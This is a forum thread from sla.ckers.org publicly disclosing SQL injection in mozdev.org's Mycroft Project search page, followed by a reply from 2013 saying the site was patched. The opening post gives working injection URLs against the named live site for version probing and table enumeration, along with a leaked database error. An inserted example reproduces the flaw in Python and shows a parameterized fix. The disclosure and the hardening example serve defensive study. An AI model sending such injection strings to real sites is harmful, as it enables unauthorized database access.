sla.ckers.org is ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: VMw4r3
Date: August 23, 2010 04:46PM


Mycroft Project is vulnerable to sql injection.



MySQL version check:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false

Error generated looking for inexistent user table:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'


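An added example, not part of the original post and not the Mycroft project's code: it reproduces the two flaws the report shows (a numeric `category` parameter concatenated into the SQL text, and the driver error echoed back to the client) next to a hardened lookup. Assumptions: SQLite stands in for the MySQL backend, and the `engines` table, its columns and the function names are hypothetical.

```python
import sqlite3

# Constructed stand-in for the site's database: table and column names are
# assumptions, and SQLite replaces the MySQL backend the post identifies.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE engines (name TEXT, category INTEGER)")
    db.executemany("INSERT INTO engines VALUES (?, ?)",
                   [("example-search", 64), ("other-search", 12)])
    return db

def lookup_concatenated(db, category):
    """The flawed pattern: the raw parameter becomes part of the SQL text."""
    sql = "SELECT name FROM engines WHERE category = " + category
    try:
        return [r[0] for r in db.execute(sql)]
    except sqlite3.Error as exc:
        # Echoing the driver error to the client is the second flaw: it leaks
        # schema and account details, as the error quoted in the post does.
        return "error = %s" % exc

def lookup_hardened(db, category):
    """Strict integer validation, a bound parameter, and a generic error."""
    if not (category.isascii() and category.isdigit() and len(category) <= 9):
        return "error = invalid category"   # nothing from the database leaks
    rows = db.execute("SELECT name FROM engines WHERE category = ?",
                      (int(category),))
    return [r[0] for r in rows]

# Parameter values: one benign, one taken from the third URL in the post.
BENIGN = "64"
POSTED = "64 and (select 1 from user limit 0,1)=1"

if __name__ == "__main__":
    db = make_db()
    for value in (BENIGN, POSTED):
        print(repr(value))
        print("  concatenated:", lookup_concatenated(db, value))
        print("  hardened:    ", lookup_hardened(db, value))
```

With the posted value, the concatenated lookup returns a database error naming the `user` table, which shows the parameter was parsed as SQL; the hardened lookup rejects it before any query runs.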
Re: mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: us3r
Date: July 03, 2013 12:01PM

After 3 years the site has been patched! :)
